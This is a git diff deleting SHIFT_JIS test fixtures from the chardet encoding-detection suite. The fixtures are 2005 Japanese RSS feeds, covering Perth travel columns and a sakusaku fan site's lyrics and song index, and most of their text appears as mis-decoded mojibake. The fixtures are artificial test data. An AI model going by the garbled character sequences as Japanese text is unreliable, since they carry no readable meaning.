ƒp[ƒX‚ֹ—¯w‚µ‚½l‚ָ‚ח‚־Aˆך“x‚ֽ“o‚ֱ‚½‚±‚ֶ‚ׂ ‚י‚ּ‚ֵ‚ֽ‚ָ‚¢‚ֵ‚µ‚ו... - -ambits - - - -column - -u–״“o‚ט‘ּ±v
    -ƒp[ƒX‚ֹ—¯w‚µ‚½l‚ָ‚ח‚־Aˆך“x‚ֽ“o‚ֱ‚½‚±‚ֶ‚ׂ ‚י‚ּ‚ֵ‚ֽ‚ָ‚¢‚ֵ‚µ‚ו‚₪‚©Hƒp[ƒX‚©‚ח“ל‚ֹװ‚ֵ–ס4װ‚ּך‚ֹ‚ ‚יƒyƒ“ƒo[ƒgƒ“(Pemberton)‚ֹA‚»‚ּ–״‚ֽ‚ ‚ט‚‚·B“o‚י‚±‚ֶ‚ֵׂ‚«‚י–״‚ֽ3–{‚ ‚טA‚±‚ך‚ח‚ּ’†‚ֵ‚א“ֱ‚ֹ—L–¼‚ָ‚ּ‚×Aƒyƒ“ƒo[ƒgƒ“‚ּ’†S•”‚©‚ח•א‚¢‚ִ‚אs‚¯‚י‚‚³61ƒ[ƒgƒ‹‚ּƒOƒ[ƒZƒXƒ^[ƒcƒ[(Glocester Tree)‚ֵ‚·B‘¼‚ּ–״‚ֽ‚¿‚ו‚ֱ‚ֶ’¬‚©‚ח—£‚ך‚ִ‚¢‚י‚ּ‚ֵװ‚ָׂ‚¢‚ֶs‚¯‚ָ‚¢‚ֶ‚±‚כ‚ֹ‚ ‚ט‚‚·B
    -‚±‚ך‚ח‚ּ–״‚ֽA‚א‚ֶ‚א‚ֶR‰־–ִ‹—p‚ּ–״‚ֵ‚µ‚½B–״‚ֹ‚ֽ“S‚ּY‚ׂ ‚י‚¾‚¯‚ֵˆְ‘S—p‚ּƒlƒbƒg‚ָ‚ַ‚ֽ‚ָ‚­Aד‚ט‰÷‚ט‚ֵנ·‚µA‚¿‚ו‚ֱ‚ֶכ¯‚ֵ‚·B‚¨‚»‚ח‚­‚‹°•|ַ‚ּl‚ֽ“o‚י‚ּ‚ֽ–³—‚ֵ‚µ‚ו‚₪B
    -ƒyƒ“ƒo[ƒgƒ“‚ֽ‘¼‚ֹ‚אתװְ’ט‚ּצ‹C‹@ײװ‚גƒƒCƒ“‚א‚ֲ‚­‚ֱ‚ִ‚¢‚‚·B’¬‚ֽ”סם‚ֹ¬‚³‚­A–״“o‚ט‚׃ƒCƒ“‚ֹ‚ָ‚ט‚‚·B—ב‚¦‚־ƒ}[ƒKƒƒbƒgƒƒo[‚©‚חƒAƒ‹ƒoƒj[‚ֹs‚­“r’†‚ֹ‚¿‚ו‚ֱ‚ֶ—§‚¿ס‚י’צ“x‚ֵ\•ֵׂ‚ֽ‚ָ‚¢‚ֵ‚µ‚ו‚₪‚©H–״“o‚ט‚ֽ‚©‚ָ‚ט‚¨‚א‚µ‚כ‚¢‚ּ‚ֵA‚÷‚׀‘ּ±‚µ‚ִ‚‚ִ‚­‚¾‚³‚¢‚ֻB]]> - -
    -
    - -ƒnƒbƒgƒƒo[‰₪‘ - -2005-12-19T03:29:36Z -2005-12-19T03:25:20Z -tag:www.perth-on.net,2005:/main//1.173 -2005-12-19T03:25:20Z -uƒnƒbƒgƒƒo[‰₪‘v ƒp[ƒX‚©‚ח–k‚ײ–ס500ƒLƒ‚ּך‚ֹA’m‚יl‚¼’m‚יƒnƒbƒgƒƒo... - -ambits - - - -column - -uƒnƒbƒgƒƒo[‰₪‘v
    -ƒp[ƒX‚©‚ח–k‚ײ–ס500ƒLƒ‚ּך‚ֹA’m‚יl‚¼’m‚יƒnƒbƒgƒƒo[‰₪‘‚ׂ ‚ט‚‚·Bƒnƒbƒgƒƒo[‰₪‘‚ֽA1970”N‚ֹ»‘‰₪‚ּƒƒIƒi[ƒhEƒPƒCƒXƒ[(Leonard Casley)‚׃I[ƒXƒgƒ‰ƒƒA‚ּ”_‹ֶ­פ‚ֹ”½‘־A‚»‚µ‚ִƒI[ƒXƒgƒ‰ƒƒA­•{‚ֹ“ֶ—§‚ני¾‚µA©g‚ּ—L‚·‚י“y’n‚נƒnƒbƒgƒƒo[‰₪‘‚ֶ‚µ‚‚µ‚½B‘–¯‚ֽ‰ֶ‘°‚ֶ]‹ֶˆץ‚ּ–ס20`30–¼’צ“x‚¾‚»‚₪‚ֵ‚·B -ְ–ג‘ט‚ֶ‚µ‚ִ‚ֽAƒI[ƒXƒgƒ‰ƒƒA­•{‚ֽ“ֶ—§‚נ”F‚‚ִ‚¢‚ָ‚¢‚ּ‚ֵ‚·‚×Aֵ‹א‚ָ‚ַ‚א”[‚‚ִ‚¢‚ָ‚¢‚ּ‚ֵ­•{‚ֽ–”F‚µ‚ִ‚¢‚י‚ּ‚ֵ‚µ‚ו‚₪‚©B
    -‰₪‘‚ּ’†‚ֹ‚ֽA‘‰₪‚ּ‘ו‚«‚ָח‚ּ“÷‘‚×–—§‚¿A‚»‚µ‚ִ‘‚ּא¹‚ֹ‚ָ‚ֱ‚ִ‚¢‚י‰₪‘ƒOƒbƒY‚ָ‚ַ‚×”„‚ֱ‚ִ‚¢‚י”„“XA‚»‚µ‚ִ“ֶ©‚ּ״ט‚ג†•¼‚‚ֵ‚ֱ‚ִ‚¢‚ִ”ƒ‚₪‚±‚ֶ‚א‚ֵ‚«‚‚·B‚‚½ƒ|ƒXƒg‚א‚ ‚ט‰₪‘‚ּƒXƒ^ƒ“ƒv‚נ‰‚µ‚ִ‚א‚ח‚¦‚½‚טAƒpƒXƒ|[ƒg‚נ‚ֱ‚ִ‚¢‚­‚ֶ“‘ƒXƒ^ƒ“ƒv‚א‰‚µ‚ִ‚א‚ח‚¦‚½‚ט‚א‚µ‚‚·B
    -‚±‚ס‚ֲָ«“I‚ָ‘‚ֽ¢E‚נ’T‚µ‚ִ‚א­‚ָ‚¢‚ּ‚ֵA­‚µ‰“‚¢‚ֵ‚·‚×—§‚¿ס‚י‚ּ‚א‚¨‚א‚µ‚כ‚¢‚ֶv‚¢‚‚·B‚¿‚ָ‚‚ֹƒp[ƒX‚©‚חƒ‚ƒ“ƒL[ƒ}ƒCƒA‚ָ‚ַ‚ֹװ‚ֵs‚­‹@‰ן‚ׂ ‚ך‚־A“r’†‚ֵס‚י‚±‚ֶ‚א‰ֲ”\‚ֵ‚·‚ּ‚ֵAƒvƒ‰ƒ“‚ֹ‘g‚“‚ך‚ִ‚‚ִ‚ֽ‚¢‚©‚ֵׂ‚·‚©B]]> - -
    -
    - -
    \ No newline at end of file diff --git a/chardet/tests/SHIFT_JIS/sakusaka-silk.net.xml b/chardet/tests/SHIFT_JIS/sakusaka-silk.net.xml deleted file mode 100644 index 7337c94..0000000 --- a/chardet/tests/SHIFT_JIS/sakusaka-silk.net.xml +++ /dev/null @@ -1,1111 +0,0 @@ - - - - - -‚µ‚י‚­.net sakusaku -http://www.sakusaku-silk.net/ -sakusaku(ƒTƒNƒTƒN)‚ּ”סצ®ƒtƒ@ƒ“ƒTƒCƒg -ja - -2005-12-18T15:58:42+09:00 - - - - - - - - - - - - - - - - - - - - - - - - - -LAST SHOOTING(ƒJ[ƒ[“c’†‚ּ‚₪‚½) -http://www.sakusaku-silk.net/archives/0512/181558.php -ƒJ[ƒ[@”Nװ‚¨”ז‚ך—l‚ֵ‚µ‚½‚ֱI

    - -
    -
    -

    LAST SHOOTING(ƒJ[ƒ[“c’†‚ּ‚₪‚½)

    - -

    •ת‘—“תF05/12/16
    -/‹ָF”’ˆהƒ”ƒBƒ“ƒZƒ“ƒg
    -‰‰‘tFƒCƒ“ƒrƒWƒuƒ‹Eƒtƒ@ƒ~ƒ[
    -‰ּF”’ˆהƒ”ƒBƒ“ƒZƒ“ƒg

    - -
    -
    - -

    ‚»‚₪‚¢‚¦‚־A‚ ‚ָ‚½‚ֹ‰ן‚ֱ‚ִ ‚א‚₪... 5”N...
    -‚»‚₪‚¢‚¦‚־A‹א‚ֹ¢‚ֱ‚ִ[–י‚ִֹ‚ׁo‚µ‚ִ ‚א‚₪... 3,4”N...

    - -

    ƒJ[ƒ[... –ƒ•z‚ּב’U“...
    -ƒJ[ƒ[... Aurevoiri‚³‚ז‚₪‚ָ‚חj...

    - -

    ƒJ[ƒ[... –ƒ•z‚ּב’U“...
    -ƒJ[ƒ[... Aurevoiri‚³‚ז‚₪‚ָ‚חj...

    - -

    ‚±‚ך‚©‚ח‚ֽƒ^ƒ‚ƒ‚³‚ס‚נ‘ו״‚ֹ‚ֻ...

    - -
    -
    ]]>
    -letssing -silknet -2005-12-18T15:58:42+09:00 -
    - -‘¾“c(‹ז)‚ּ‚₪‚½ -http://www.sakusaku-silk.net/archives/0512/171630.php -oota.jpg

    - -

    ‘ו“c‹ז‚ּ‰ּI‘ו“c‹ז‚ֹ‚ֽ“H‘ו‚ׂ ‚ט‚‚·B
    -פ‘«’r‚ֶ‚©‚©‚ָ‚ט‹‚¢Iis‚ֱ‚½‚±‚ֶ‚ָ‚¢‚¯‚ַj
    -

    - -
    -
    -

    ‘¾“c(‹ז)‚ּ‚₪‚½

    - -

    •ת‘—“תF05/12/16
    -/‹ָF”’ˆהƒ”ƒBƒ“ƒZƒ“ƒg
    -‰‰‘tFƒCƒ“ƒrƒWƒuƒ‹Eƒtƒ@ƒ~ƒ[
    -‰ּF”’ˆהƒ”ƒBƒ“ƒZƒ“ƒg

    - -
    -
    - -

    ˜Z‹½“yט‚ֵ...ƒ|ƒbƒeƒ...
    -“ת‚¾‚‚ט‚ֵ...ƒ|ƒbƒeƒ...
    -‰H“c‚ּ‹ף...”עs‹@...
    -‚±‚ס‚ָ“ת‚ֽ...ƒ|ƒbƒeƒ...

    - -

    ‘ו“c‹ז‚ֹ‚ּֽAƒoƒCƒg‚ֵ‚ז‚­s‚ֱ‚½
    -‘‹ƒKƒ‰ƒX‚נ‚׃‚«‚ֹƒoƒCƒg‚ֵ‚ז‚­s‚ֱ‚½
    -‘ו“c‹ז‚ֹ‚ֽ¡‚¶‚בƒTƒNƒTƒJ[‚ב½‚­
    -‚¢‚ִ‚­‚ך‚י‚ָ‚ס‚ִ...‚ ‚...

    - -

    ‰´‚×A‚‚ׂ¢‚½...
    -‘‹ƒKƒ‰ƒX‚ֽ‚¢‚‚¾ƒsƒJƒsƒJ‚ֵ...
    -“ֱ‚ֹ‚ִ‚¢‚ֻ‚¢‚ֹA‚ג‚ֱ‚ֶ‚«‚‚µ‚½
    -ƒuƒ‰ƒV~‚Q‰ס{‚©‚ֱ‚ֿ‚¬‚Q‰ס

    - -

    ¦׀’·i‚»‚ס‚ָƒgƒR‚¢‚¢‚©‚חA‚א‚₪‹A‚כ‚₪‚ז...j

    - -

    u’¹‹vv‚ּ•“–...
    -’‹‹x‚...צ‰€‚ֵ...
    -פ‘«’r‚ֵ...ƒ|ƒbƒeƒ...
    -‰L‚ּ–״‚ֵ...ƒ|ƒbƒeƒ...

    - -

    ¦׀’·i‚א‚₪‰½‚ג‚ֱ‚ִ‚ס‚¾‚¢AƒAƒ“ƒ^‚½‚¿‚ֱIj

    - -

    ‘ו“c‹ז‚ֹ‚ּֽAƒoƒCƒg‚ֵ‚ז‚­s‚ֱ‚½
    -‘‹ƒKƒ‰ƒX‚נ‚׃‚«‚ֹƒoƒCƒg‚ֵ‚ז‚­s‚ֱ‚½
    -‘ו“c‹ז‚ֹ‚ֽ¡‚¶‚בƒTƒNƒTƒJ[‚ב½‚­
    -‚¢‚ִ‚­‚ך‚י‚ָ‚ס‚ִ...‚ ‚...

    - -

    ‰´‚×A‚‚ׂ¢‚½...
    -‘‹ƒKƒ‰ƒX‚ֽ‚¢‚‚¾ƒsƒJƒsƒJ‚ֵ...
    -ƒXƒNƒC[ƒW‚ּƒSƒ€V•i‚ֹ‚µ‚ֶ‚«‚‚µ‚½...
    -ƒXƒW‚P–{‚½‚ט‚ֶ‚אc‚³‚‚ז‚₪‚ֹ

    - -

    ¦׀’·iƒAƒ“ƒ^A–{•¨‚¾‚ז...j

    - -

    O‚ּiFA‚ז‚­©‚¦‚‚·‚©H
    -D‚«‚ָl‚ּח©‚¦‚‚·‚©H

    - -

    ¦׀’·iƒMƒ“ƒMƒ“‚¾‚ז‚ֱIj

    - -

    ‚ ‚ּƒR‚ּח‚ז‚­©‚¦‚‚·‚©H
    -ƒJƒGƒ‰‚ּח‚ז‚­©‚¦‚‚·‚©H

    - -

    ¦׀’·iƒrƒ“ƒrƒ“‚¾‚זA‚א‚₪‚ֱIj

    - -

    “ת‚¾‚‚ט•‘½–€ל...
    -Sunshine&Water...
    -‘וX•—“c‚ֵ...‘¾“c... ƒCƒG[ƒXI

    - -

    ¦׀’·i¡“תA‹A‚ט‰½‚©H‚׳‚ִ‚­‚©‚¢...Hj

    - -
    -
    ]]>
    -letssing -silknet -2005-12-17T16:30:21+09:00 -
    - -‚‚ס‚ָ‚ֵ‚₪‚½‚¨‚₪ˆך——•\“ת•t‡i‰¼j -http://www.sakusaku-silk.net/archives/0512/130110.php - -‚ֶ‚ט‚ ‚¦‚¸‘Sƒf[ƒ^“—ֽ‚µI‚ם‚ֱ‚½I@‘”–ס190‹ָI
    -‘½‚·‚¬II
    -
    -‚ֱ‚ִ‚±‚ֶ‚ֵAד‚ֽ•\¦•”•ׂגץ•”•ֶׂ‚©ל‚ך‚־®¬H
    -‚ָ‚ס‚ֵ‚·‚×A‚½‚װ‚סװ‚©‚©‚י‚ס‚ֵA‚ֶ‚ט‚ ‚¦‚¸“ת•t‡‚ֹ‘S‰ּˆך——‚¾‚¯ז‚ֹUP‚µ‚¿‚ב‚¢‚‚·`
    -
    - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
    (95)------“s‰÷‚ּƒe[ƒ}
    (97)------ƒ~ƒmƒtƒ‹ƒyƒp[
    (96)------‰F’ˆםֽƒJƒGƒ‰
    (1)03.12.03‹Uƒnƒ}‚ֱ‚±ƒuƒ‹[ƒX ver.1
    (5)03.12.24לט‚ּ— ver.1
    (98)03.12.24ֳ“ל‚ּ‚₪‚½
    (101)04.01.01‘ו‚«‚ֳָv
    (99)04.01.01ƒUƒuƒ“
    (100)04.01.01‚¨y‚µ‚‰F’ˆƒ{ƒbƒNƒX‚ּ‚₪‚½
    (102)04.01.01ƒTƒNƒTƒJ[‚ּ‚₪‚½
    (103)04.01.14‘“S‚ּ‚₪‚½ ver.1
    (149)04.01.19•ִq‚ּ‘ײ‚¦‰ּ
    (19)04.01.21‘–ֽ´‚ּ‚₪‚½
    (104)04.01.27‘“S‚ּ‚₪‚½ ver.2
    (105)04.01.29TSURARA
    (6)04.02.03לט‚ּ— ver1.5
    (2)04.02.04‹Uƒnƒ}‚ֱ‚±ƒuƒ‹[ƒX ver.2
    (106)04.02.09ƒTƒNƒTƒN‚ֽ‚ָ‚÷
    (130)04.02.10“s‰÷‚¿‚ב‚ס‚ֽ‚ֻ
    (107)04.02.12ƒNƒ[ƒ“ƒQ[ƒ€DEƒ[ƒI
    (150)04.02.13¢E‚ֵ‚׀‚ֶ‚ֲ‚¾‚¯‚ּƒJƒGƒ‰
    (151)04.02.13LOVE SONG
    (108)04.02.20ƒOƒbƒoƒCƒ}ƒiƒxƒbƒ`
    (152)04.02.23Q”n§–¯‚ּ‚₪‚½
    (9)04.02.27O‰Y‚ּ‚₪‚½ ver.1
    (3)04.03.04‹Uƒnƒ}‚ֱ‚±ƒuƒ‹[ƒX ver2.5
    (153)04.03.05‚²ˆ׃©”װ‚ּ‚₪‚½
    (109)04.03.11‰´ƒpƒ\‚ּƒe[ƒ}
    (7)04.03.12לט‚ּ— ver.2
    (63)04.03.22ƒƒ‹ƒV[•{’† ver.1
    (20)04.03.23‘–ֽ´‚ּ‚₪‚½ ver.1
    (11)04.03.23¬“c´‚ּ‚₪‚½ ver.1
    (15)04.03.24ת–״‚ּ— ver.1
    (110)04.04.02ƒTƒNƒ‰i“ֶ¥j
    (154)04.04.05ƒTƒNƒTƒJ[‚ּ‚₪‚½ ‡¥
    (155)04.04.09‚¨y‚µ‚‰F’ˆƒ{ƒbƒNƒX‚ּ‚₪‚½ ƒƒbƒLƒ“ƒuƒ‹[ƒXVer
    (17)04.04.13ˆ»£‚ּ‚₪‚½ ver.1
    (12)04.04.14¬“c´‚ּ‚₪‚½ ver.2
    (111)04.04.15–{’¬ƒoƒhƒ~ƒ“ƒgƒ“•”‰‰‡‰ּ
    (21)04.04.16‘–ֽ´‚ּ‚₪‚½ ver.2
    (112)04.04.20‰¡•lƒxƒCƒXƒ^[ƒY‰‰‡‰ּ
    (65)04.04.23’¬“c‚ּƒoƒ‰[ƒh ver.1
    (23)04.04.30C˜V–¼‚ּ‚₪‚½
    (25)04.05.03™‘q‚ּ‚₪‚½
    (27)04.05.04’ֳ‹vˆה‚ּ‚₪‚½`‘–ֽ־‚ּ‚₪‚½
    (29)04.05.05“¡–ל‚ּ‚₪‚½
    (78)04.05.06‰Yˆְ‚ּ‚₪‚½ ver.1
    (31)04.05.07“¡‘ע‚ּ‚₪‚½
    (18)04.05.17ˆ»£‚ּ‚₪‚½ ver.2
    (33)04.05.193‚ֲ‚ּל‚ּƒgƒƒƒW[
    (35)04.05.20`–ל‚ּ‚₪‚½ Field of ƒnƒ_
    (79)04.05.31O“‡‚ּ‚₪‚½
    (10)04.06.03O‰Y‚ּ‚₪‚½ ver.2
    (113)04.06.03‚¨Z‚¿‚ב‚סƒoƒXƒP‚ּ‚₪‚½
    (114)04.06.07ƒgƒEƒ_ƒC`1“ת‚ּI‚ם‚ט‚ּ‚₪‚½
    (16)04.06.10ת–״‚ּ— ver2
    (67)04.06.11—§ל‚ּ‚₪‚½
    (68)04.06.14’²•z‚ּ‚₪‚½ ver.1
    (37)04.06.15ְװ‚ּ‚₪‚½
    (13)04.06.17§¼ƒƒ“ƒWƒƒ[‚ּ‚₪‚½(¬“c´E“’‰ֽ´E‘«•¿‚ּ‚₪‚½)
    (115)04.06.28‚¨‚½‚ז‚ט‚ ‚ִז‚ּ‚₪‚½
    (39)04.07.13‘וˆה¼“c‚ּ‚₪‚½
    (70)04.07.20¬‹אˆה‚ּ‚₪‚½ ver.1
    (116)04.07.23‰װ‰װƒ‰ƒ“ƒh
    (40)04.08.03•½’ֻ‚ּ‚₪‚½
    (8)04.08.06לט‚ּ— ver.3iלט‘ו´׃ױƒo[ƒWƒ‡ƒ“j
    (117)04.08.10‘Ps’c’n‚ּ‚₪‚½
    (71)04.08.17‘—§cƒuƒ[ƒNƒ“ƒn[ƒg ver.1
    (41)04.08.23C‚¶‚ב‚ָ‚¢ƒ–ט‚ּ‚₪‚½
    (118)04.08.26ƒgƒEƒ_ƒC`1“ת‚ּI‚ם‚ט‚ּ‚₪‚½ ”‘½ƒo[ƒWƒ‡ƒ“
    (82)04.08.26”‘½‚ּ—i‚׀‚ֶj
    (72)04.09.06÷“‡‚ּ‚₪‚½ ver.1
    (43)04.09.07‘וˆי‚ּ‚₪‚½
    (119)04.09.13aiko‚µ‚ב‚ס‚ֹ•ש‚°‚י‚₪‚½
    (83)04.09.14“װ‚ּ‚₪‚½
    (120)04.09.16דR”’‘g‰‰‡‰ּ
    (84)04.09.20s“c‚ּ‚₪‚½
    (121)04.09.21t–¼‚¿‚ב‚ס‚ֹ•ש‚°‚י‰ּ
    (122)04.09.22“‹}ƒnƒ“ƒY‰¡•l“X‚ּ‚₪‚½
    (44)04.09.24‘ו˜a‚ּ‚₪‚½
    (64)04.09.27ƒƒ‹ƒV[•{’† ver.2
    (46)04.09.30ˆֹ¨´‚ּ‚₪‚½
    (123)04.10.04s‚¯AƒJƒGƒ‰‚ֱI‚ּ‚₪‚½
    (124)04.10.05‚ ‚יב‚«—«ƒTƒbƒNƒX‘tׂ‚ּ‚₪‚½
    (85)04.10.07ƒo[ƒjƒ“ƒAƒbƒvA’¹ז `’¹ז‚ֽ¡A”R‚¦‚ִ‚¢‚י`
    (66)04.10.08’¬“c‚ּƒoƒ‰[ƒh ver.2
    (74)04.10.12’†–ל‚ּ‚₪‚½ ver.1
    (125)04.10.15THE FINAL BATTLE
    (61)04.10.19‘•×›‚ּ‚₪‚½
    (126)04.10.22Happy Birthday
    (127)04.10.28ƒJƒ{ƒ`ƒƒ[ƒ}ƒ“‚ּ‚₪‚½
    (24)04.10.29C˜V–¼‚ּ‚₪‚½ ‚±‚ּ‘O‚ֽ‚²‚‚ס‚ָ‚³‚¢ver.
    (87)04.11.02‹·R‚ּ‚₪‚½
    (75)04.11.16—”n‚ּ‚₪‚½ ver.1
    (48)04.11.22—tR‚ּ‚₪‚½
    (88)04.11.25]•‚ּ‚₪‚½
    (129)04.11.30‚»‚ך‚ה‚¯ƒvƒƒ“ƒ^[
    (49)04.12.07’†ˆה‚ּ‚₪‚½
    (50)04.12.07“ס‹{‚ּ‚₪‚½
    (90)04.12.09•‰×‚ֹ•ש‚°‚י‚₪‚½
    (53)04.12.20‰¡{‰ך‚ּ‚₪‚½
    (52)04.12.21€q‚ּ‚₪‚½
    (62)04.12.24‘•×›‚ּ‚₪‚½ ‘וף‹ָ
    (128)04.12.24‚ ‚ט‚ֶׂ‚₪
    (47)05.01.11ˆֹ¨´‚ּ‚₪‚½ ver.2
    (4)05.01.13‹Uƒnƒ}‚ֱ‚±ƒuƒ‹[ƒX featuring ‚ה‚¸•ƒfƒ…ƒGƒbƒgver.
    (54)05.01.20‰¡{‰ך‚ּ‚₪‚½ ver.2
    (55)05.01.25J¬‚ּ‚₪‚½
    (34)05.01.313‚ֲ‚ּל‚ּƒgƒƒƒW[ ver2.0
    (131)05.02.14St.Valentine Day Is Not So Wonderful ƒoƒƒ“ƒ^ƒCƒ“ƒfƒC‚ֽ‚»‚₪‘f°‚ח‚µ‚¢‚א‚ּ‚¶‚ב‚ָ‚¢
    (132)05.02.15St.Valentine Day Was Not So Wonderful ƒoƒƒ“ƒeƒCƒ“ƒf[‚ֽ‚»‚ך‚‚ַ‘f°‚ח‚µ‚­‚ָ‚©‚ֱ‚½
    (57)05.02.15יR‚ּ‚₪‚½
    (58)05.02.16^’‚ּ‚₪‚½
    (81)05.02.17O“‡‚ּ‚₪‚½ ver.2
    (80)05.02.17O“‡‚ּ‚₪‚½ ver.2 i‘±EO“‡‚ּ‚₪‚½j
    (69)05.02.22’²•z‚ּ‚₪‚½ ver.2
    (51)05.02.28“ס‹{‚ּ‚₪‚½ ver.2
    (59)05.03.03” ×‚ּ‚₪‚½
    (91)05.03.10ה“aך‚ּ‚₪‚½
    (86)05.03.11ƒo[ƒjƒ“ƒAƒbƒvA’¹ז ‚³‚ח‚ֹƒo[ƒjƒ“ƒAƒbƒv’¹ז
    (133)05.03.14White day is not so wonderful ƒzƒAƒCƒgƒfƒC‚ֽ‚»‚ס‚ָ‚ֹ‘f°‚ח‚µ‚¢‚א‚ּ‚¶‚ב‚ָ‚¢
    (92)05.03.17”MC‚ּ‚₪‚½
    (134)05.03.18_“ל‚ּ‰ּ(§“א‚®‚י‚טˆך‹L”Oƒ\ƒ“ƒO)
    (60)05.03.18R–k‚ּ‚₪‚½
    (135)05.03.21“d‹C’M‘וw‚ּ‚₪‚½
    (148)05.03.22’†–ל‚ּ‚₪‚½ l‚©•¨‚©‚א‚ֱ‚ֶ‚ם‚©‚ס‚ָ‚­‚ָ‚יVer.
    (136)05.03.28‚¨y‚µ‚‰F’ˆ‘‚ּ‚₪‚½
    (30)05.03.28“¡–ל‚ּ‚₪‚½ ver2.0
    (28)05.03.28’ֳ‹vˆה‚ּ‚₪‚½`‘–ֽ־‚ּ‚₪‚½ ver.2
    (76)05.03.30—”n‚ּ‚₪‚½ ver.2
    (77)05.03.31‘«—§‚ּ‚₪‚½
    (137)05.04.01O‘יs—§‘ז“ס’†wZZ‰ּ
    (42)05.04.04C‚¶‚ב‚ָ‚¢ƒ–ט‚ּ‚₪‚½ ver.2
    (38)05.04.05ְװ‚ּ‚₪‚½ ver.2
    (26)05.04.06™‘q‚ּ‚₪‚½ ver2
    (89)05.04.07]•‚ּ‚₪‚½ ver2.0
    (45)05.04.08‘ו˜a‚ּ‚₪‚½ ver.2
    (138)05.04.25ƒTƒNƒ‰i“ֶ¥j
    (139)05.05.02‚¨y‚µ‚‰F’ˆBOX evolution 3 SOLAR SYSTEM‚ּ‚₪‚½
    (36)05.05.03`–ל‚ּ‚₪‚½ ver.2
    (22)05.05.04‘–ֽ´‚ּ‚₪‚½ ver.3
    (140)05.05.05•“cM÷צ‚ּ‚₪‚½
    (141)05.05.06“‹”_H‘וw‚ּ‚₪‚½
    (147)05.05.09_“ל‘וw‚ּ‚₪‚½
    (142)05.05.27“‹H‹ֶ‘וw‚ּ‚₪‚½
    (93)05.06.02D–y‚ּ‚₪‚½
    (94)05.06.09ˆ®ל‚ּ‚₪‚½
    (56)05.06.20J¬‚ּ‚₪‚½ l‹C“•[‘ז3ˆ
    (146)05.06.22•ִq‚³‚ס‚ֹ•ש‚°‚י‚₪‚½
    (73)05.06.23”׉₪q‚ּ‚₪‚½
    (145)05.06.24•{’†‚Z‚ּ‚₪‚½
    (32)05.06.27“¡‘ע‚ּ‚₪‚½ ver2.0
    (144)05.06.27–{“–‚ּ•–‹‚ּƒe[ƒ}
    (143)05.06.27•–‹‚ּƒe[ƒ}
    (14)05.06.30§¼ƒƒ“ƒWƒƒ[‚ּ‚₪‚½(¬“c´E“’‰ֽ´E‘«•¿‚ּ‚₪‚½) `‚¨“’‚½‚ֱ‚ױ‚טver.`
    (156)05.07.04ƒ”ƒBƒ“ƒZƒ“ƒg‚ּƒe[ƒ} I
    (157)05.07.25ƒ”ƒBƒ“ƒZƒ“ƒg‚ּƒe[ƒ} II
    (159)05.07.25–״‘÷ƒJƒGƒ‰‚ּƒe[ƒ}
    (161)05.07.27•ִƒuƒƒVƒ“ƒO‚ּƒe[ƒ}
    (160)05.07.27GOIGOI‚ּƒe[ƒ}
    (158)05.07.28ƒ”ƒBƒ“ƒZƒ“ƒg‚ּƒe[ƒ} III
    (162)05.08.05—”n‚ּ‚₪‚½ ‘ז“סֽ
    (163)05.08.15÷•ֿ‚ם‚ט‚ּ‚₪‚½
    (169)05.08.17`–ל‚ּ‚₪‚½
    (164)05.08.18NEW YORK‚ּ‚₪‚½
    (165)05.08.22C˜V–¼‚ּ‚₪‚½ `ƒSƒCƒSƒC‚ֹ•ש‚®`
    (170)05.08.24ƒ”ƒBƒ“ƒZƒ“ƒg‚ּƒe[ƒ} III iƒfƒBƒXƒR Versionj
    (171)05.08.30“J‚ּ‚₪‚½
    (166)05.09.01‘½–€‚ּ‚₪‚½
    (167)05.09.15‹gֻ›‚ּ‚₪‚½(ƒWƒ‡[ƒW... ON MY MIND)
    (168)05.09.20ֲ”~‚ּ‚₪‚½
    (172)05.09.22“ת–ל‚ּ‚₪‚½
    (173)05.09.30ˆ»£‚ּ‚₪‚½ ƒoƒ‰[ƒh version
    (174)05.10.03“ס–“ל‚ּ‚₪‚½
    (175)05.10.13‘וד‚ּ‚₪‚½
    (176)05.10.14“ס‹{‚ּ‚₪‚½ ƒGƒƒLEƒMƒ^[“‚ט®‘S”ֵ
    (177)05.10.19לט‚ּ— ƒ”ƒ@[ƒWƒ‡ƒ“ƒAƒbƒvver
    (178)05.10.20¼“‹‚ּ‚₪‚½
    (179)05.10.31C’ך‚ּ‚₪‚½
    (180)05.11.01‘—§cƒuƒ[ƒNƒ“ƒn[ƒg ver.2
    (181)05.11.02F’J‚ּ‚₪‚½
    (183)05.11.18¬‹אˆה‚ּ‚₪‚½ ver.2
    (182)05.11.24‰F“s‹{‚ּ‚₪‚½
    (184)05.12.02O‘י‰w
    (185)05.12.08_ֻ‚ּ‚₪‚½
    ]]>
    -sakusakuintro -silknet -2005-12-13T01:10:53+09:00 -
    - -¬‹אˆה‚ּ‚₪‚½ -http://www.sakusaku-silk.net/archives/0512/112107.php - -
    -

    ¬‹אˆה‚ּ‚₪‚½

    - -

    •ת‘—“תF05/11/18
    -/‹ָF”’ˆהƒ”ƒBƒ“ƒZƒ“ƒg
    -‰‰‘tFƒCƒ“ƒrƒWƒuƒ‹Eƒtƒ@ƒ~ƒ[
    -‰ּF”’ˆהƒ”ƒBƒ“ƒZƒ“ƒg

    - -
    -
    - -

    ƒRƒKƒl[ƒ[@•‘ –לƒ}ƒ_ƒ€
    -ƒRƒKƒl[ƒ[@ƒIƒVƒƒƒ‚ָƒ‚ƒiƒ€[ƒ‹i—צlj
    -ƒRƒKƒl[ƒ[@’‹‰÷‚ׂט‚ ‚ָ‚½‚ֶ
    -ƒRƒKƒl[ƒ[@Je ne pourrai jamais vivre sans toi...
    -i‚ ‚ָ‚½‚ָ‚µ‚ֵ‚ֽ¶‚«‚ִ‚¢‚¯‚‚¹‚סj

    - -

    ‚¨”ƒ‚¢•¨‚ֽA¼—F or ’·ט‰®...H‚א‚µ‚­‚ֽA‚¢‚ָ‚°‚ג...H
    -“תP‚³‚µ‚ִA”’‚¢ƒƒ“ƒs[ƒX...
    -ƒRƒKƒl[ƒ[@’‹‰÷‚ׂט‚ ‚ָ‚½‚ֶ...
    -ƒRƒKƒl[ƒ[@Vous vous applez commentH
    -i‚¨–¼‘O‚ֽ‚ָ‚ס‚ֵ‚·‚©Hj

    - -

    “¥״‚ּ‚±‚₪‚ֹ‚ ‚ָ‚½
    -‚½‚½‚¸‚ס‚ֵ‚י ו‡‹C˜O‚ּ‚ז‚₪‚ֹ
